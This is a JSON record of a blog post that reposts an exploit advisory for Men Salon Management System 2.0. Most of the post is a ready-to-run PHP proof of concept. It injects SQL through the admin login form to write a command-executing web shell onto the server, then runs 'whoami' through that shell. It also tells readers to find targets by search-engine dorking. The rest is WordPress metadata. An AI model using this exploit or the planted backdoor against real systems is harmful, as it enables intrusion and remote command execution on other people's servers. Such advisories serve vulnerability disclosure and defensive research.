{"id":59708,"date":"2024-09-13T19:50:08","date_gmt":"2024-09-13T16:50:08","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/181510\/msms20-inject.txt"},"modified":"2024-09-13T19:50:08","modified_gmt":"2024-09-13T16:50:08","slug":"men-salon-management-system-2-0-php-code-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/men-salon-management-system-2-0-php-code-injection\/","title":{"rendered":"Men Salon Management System 2.0 PHP Code Injection"},"content":{"rendered":"<p>=============================================================================================================================================<br \/>| # Title : Men Salon Management System 2.0 php code injection Vulnerability |<br \/>| # Author : indoushka |<br \/>| # Tested on : windows 10 Fr(Pro) \/ browser : Mozilla firefox 130.0.0 (64 bits) |<br \/>| # Vendor : https:\/\/phpgurukul.com\/men-salon-management-system-using-php-and-mysql\/ |<br \/>=============================================================================================================================================<\/p>\n<p>poc :<\/p>\n[+] Dorking In Google Or Other Search Engine.<\/p>\n[+] This payload injects PHP code containing a back door.<\/p>\n[+] Line 16 + 19 Set your Target.<\/p>\n[+] save payload as poc.php<\/p>\n[+] usage from cmd : C:\\www\\test&gt;php 1.php<\/p>\n[+] payload :<\/p>\n<p>&lt;?php<br \/>\/\/ Required libraries<br \/>function send_request($url, $data) {<br \/>$options = [<br \/>&#8216;http&#8217; =&gt; [<br \/>&#8216;header&#8217; =&gt; &#8220;Content-Type: application\/x-www-form-urlencoded\\r\\n&#8221;,<br \/>&#8216;method&#8217; =&gt; &#8216;POST&#8217;,<br \/>&#8216;content&#8217; =&gt; http_build_query($data),<br \/>]];<br \/>$context = stream_context_create($options);<br \/>return file_get_contents($url, false, $context);<br \/>}<\/p>\n<p>\/\/ 
Set a fixed URL<br \/>$url = &#8216;http:\/\/localhost\/msms\/&#8217;;<\/p>\n<p>\/\/ Fixed path to upload the file<br \/>$path = &#8216;C:\\www\\msms\\uploaded.php&#8217;;<br \/>$path = str_replace(&#8220;\\\\&#8221;, &#8220;\\\\\\\\&#8221;, $path);<\/p>\n<p>\/\/ Backdoor payload<br \/>$backdoor_payload = &#8216;&lt;?php if (isset($_GET[&#8220;cmd&#8221;])) { system($_GET[&#8220;cmd&#8221;]); } ?&gt;&#8217;;<\/p>\n<p>\/\/ Send a PHP file containing the backdoor<br \/>$payload = [<br \/>&#8216;username&#8217; =&gt; &#8220;admin&#8217; union select &#8216;&#8221; . addslashes($backdoor_payload) . &#8220;&#8216; into outfile &#8216;&#8221; . $path . &#8220;&#8216; &#8212; &#8216;a&#8221;,<br \/>&#8216;password&#8217; =&gt; &#8216;test&#8217;,<br \/>&#8216;login&#8217; =&gt; &#8221;<br \/>];<br \/>send_request($url . &#8220;admin\/index.php&#8221;, $payload);<\/p>\n<p>echo &#8220;[+] PHP backdoor uploaded successfully at $path\\n&#8221;;<\/p>\n<p>\/\/ Execute the uploaded PHP file and test the backdoor<br \/>$response = file_get_contents($url . &#8220;uploaded.php?cmd=whoami&#8221;);<br \/>echo &#8220;[+] Response from the backdoor (executing &#8216;whoami&#8217;): \\n$response\\n&#8221;;<br \/>?&gt;<\/p>\n<p>Greetings to :============================================================<br \/>jericho * Larry W. 
Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br \/>==========================================================================<\/p>\n","protected":false},"excerpt":{"rendered":"<p>=============================================================================================================================================| # Title : Men Salon Management System 2.0 php code injection Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) \/ browser : Mozilla firefox 130.0.0 (64 bits) || # Vendor : https:\/\/phpgurukul.com\/men-salon-management-system-using-php-and-mysql\/ |============================================================================================================================================= poc : [+] Dorking \u0130n Google Or Other Search Enggine. [+] This payload inject php &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59708","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59708","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59708"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59708\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59708"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categ
ories?post=59708"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59708"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}